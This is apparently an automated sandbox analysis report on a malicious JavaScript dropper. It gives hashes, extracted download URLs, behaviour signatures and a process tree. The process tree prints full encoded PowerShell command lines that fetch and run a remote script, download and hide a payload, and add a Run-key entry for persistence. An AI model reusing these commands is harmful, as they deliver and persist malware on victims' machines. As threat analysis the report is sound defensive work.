Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
17/05/2023, 10:19
Static task
static1
Behavioral task
behavioral1
Sample
doc4978316.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
doc4978316.js
Resource
win10v2004-20230220-en
General
-
Target
doc4978316.js
-
Size
35KB
-
MD5
c21cf0ea00b1fd7e53fa14b55dd1be82
-
SHA1
aff249ddfc8d8fac75d0bf040579cf32e0d50e2a
-
SHA256
c9e6dc44db59f1883e850babac21890e5723d2627a623c47f709e3bb7d073e35
-
SHA512
82e4004f78f1aef5dfd1ae83b6dec4422e0960d15b6bb5f845ae7af13617fa9349046ce74be0b893de2e139ee6c93106048f0f2be70199d6567095c14d1ae618
-
SSDEEP
384:Wj9safdV7zZ/iRRil5Vxy67U2j0etD/1qQMmFcDpOlkjQSHnY4bvwn3QmvCBHx5H:WCWZERq02j0I/1YH9gSRvww7EjzG1
Malware Config
Extracted
https://birikina.it/files/f1.ps1
Extracted
https://alnama.net/realty/license.php
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1980 powershell.exe 6 1980 powershell.exe 8 1980 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Run\ONEN0TEupdate_5977 = "C:\\Users\\Admin\\AppData\\Roaming\\ONEN0TEupdate_5977\\client32.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1980 powershell.exe 1944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2040 wrote to memory of 2004 2040 wscript.exe 28 PID 2040 wrote to memory of 2004 2040 wscript.exe 28 PID 2040 wrote to memory of 2004 2040 wscript.exe 28 PID 2004 wrote to memory of 1980 2004 cmd.exe 30 PID 2004 wrote to memory of 1980 2004 cmd.exe 30 PID 2004 wrote to memory of 1980 2004 cmd.exe 30 PID 1980 wrote to memory of 1944 1980 powershell.exe 31 PID 1980 wrote to memory of 1944 1980 powershell.exe 31 PID 1980 wrote to memory of 1944 1980 powershell.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\doc4978316.js1⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c PoWersHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAcgBpAGsAaQBuAGEALgBpAHQALwBmAGkAbABlAHMALwBmADEALgBwAHMAMQAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWersHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAcgBpAGsAaQBuAGEALgBpAHQALwBmAGkAbABlAHMALwBmADEALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -windowstyle minimized -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGEAbABuAGEAbQBhAC4AbgBlAHQALwByAGUAYQBsAHQAeQAvAGwAaQBjAGUAbgBzAGUALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABPAE4ARQBOADAAVABFAHUAcABkAGEAdABlAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAE8ATgBFAE4AMABUAEUAdQBwAGQAYQB0AGUAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
62KB
MD53ac860860707baaf32469fa7cc7c0192
SHA1c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58ca48ff8ff2696ce523d56574a09d854
SHA1c170f3a13e46cac6a4eff938c9406e77ef63bde3
SHA25634ed9defe71b323c8c3624dfe36052bcd98124e9acfcc5872d9c839015779111
SHA512adeeb4095fc98eae44cfa4bd6ca66ef48d81bddab287b80c8c1f581fa87c51678d73166fcfb1573536326ac3cae9f3582266918b3ba495b9fb136a9e49f18e31
-
Filesize
61KB
MD5fc4666cbca561e864e7fdf883a9e6661
SHA12f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5
SHA25610f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b
SHA512c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d
-
Filesize
164KB
MD54ff65ad929cd9a367680e0e5b1c08166
SHA1c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD547f6cabe54656efbb47f1961003b70a2
SHA194b5612ee5378808583d7b09713caefbdb87448b
SHA256e1cd9d9429519e2bef8f713f05dcd91264ef8fe5a83c6b22a1e48ff287ca53c9
SHA512da38cd745f7fbd2f1e7032d51efcf50cafc8d68b292aa616b6023082880eec6f453fd217a786d272131b0c7ecfcbd0281fa200e632c91a32096b161f7c798ccc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W7RNLN0H5FK2DRBIZA5V.temp
Filesize7KB
MD547f6cabe54656efbb47f1961003b70a2
SHA194b5612ee5378808583d7b09713caefbdb87448b
SHA256e1cd9d9429519e2bef8f713f05dcd91264ef8fe5a83c6b22a1e48ff287ca53c9
SHA512da38cd745f7fbd2f1e7032d51efcf50cafc8d68b292aa616b6023082880eec6f453fd217a786d272131b0c7ecfcbd0281fa200e632c91a32096b161f7c798ccc